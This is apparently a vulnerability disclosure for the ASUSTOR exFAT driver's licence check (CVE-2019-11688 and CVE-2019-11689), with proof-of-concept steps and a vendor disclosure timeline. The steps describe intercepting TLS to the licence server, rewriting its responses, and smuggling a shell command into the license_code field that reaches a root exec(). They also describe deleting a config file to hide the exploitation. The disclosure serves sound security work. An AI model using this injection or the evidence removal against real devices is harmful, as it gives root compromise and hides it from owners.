- ASUSTOR exFAT Driver <= 1.0.0.r20
- CVE-2019-11688 - TLS validation failure
- CVE-2019-11689 - Improper input sanitization
exFAT is a filesystem designed for external storage devices and is defined as the SD Card Association standard filesystem for SD cards over 32 GB. Because the underlying technology is patented by Microsoft, NAS providers have began selling support for the filesystem as an addon driver.
The ASUSTOR exFAT implementation is available via App Central. Once installed, a license key must be entered, which is online validated against an ASUSTOR server.
During this online check, the licensing application is vulnerable to a man-in-the-middle attack and ultimately remote code execution. The licensing application runs as root on the device.
- Install ASUSTOR exFAT Driver from App Central
- Intercept TLS traffic to asustornasapi.asustor.com by your preferred means (mitmproxy and DNS interception was used during POC development)
- Intercept HTTP POST to
/test/exfat/AS16xxxxxxxxxxxx - Rewrite server response to
{"success":true} - Intercept second HTTP POST to
/test/exfat/AS16xxxxxxxxxxxx - Rewrite server response to
{"success":true,"registered":true,"license_code":"';touch /tmp/RCE;echo '"}Note: Payload is passed directly to exec(), so quotes must be properly matched to avoid shell errors. - Remove
/usr/builtin/etc/reg.conffile to eliminate any evidence of exploitation.
- 04/27/2019 - Emailed [email protected], received email bounce
- 04/28/2019 - General support provided an internal contact for security issues
- 04/29/2019 - Details sent to internal contact
- 05/02/2019 - ASUSTOR confirms vulnerability and fix, requested disclosure timeline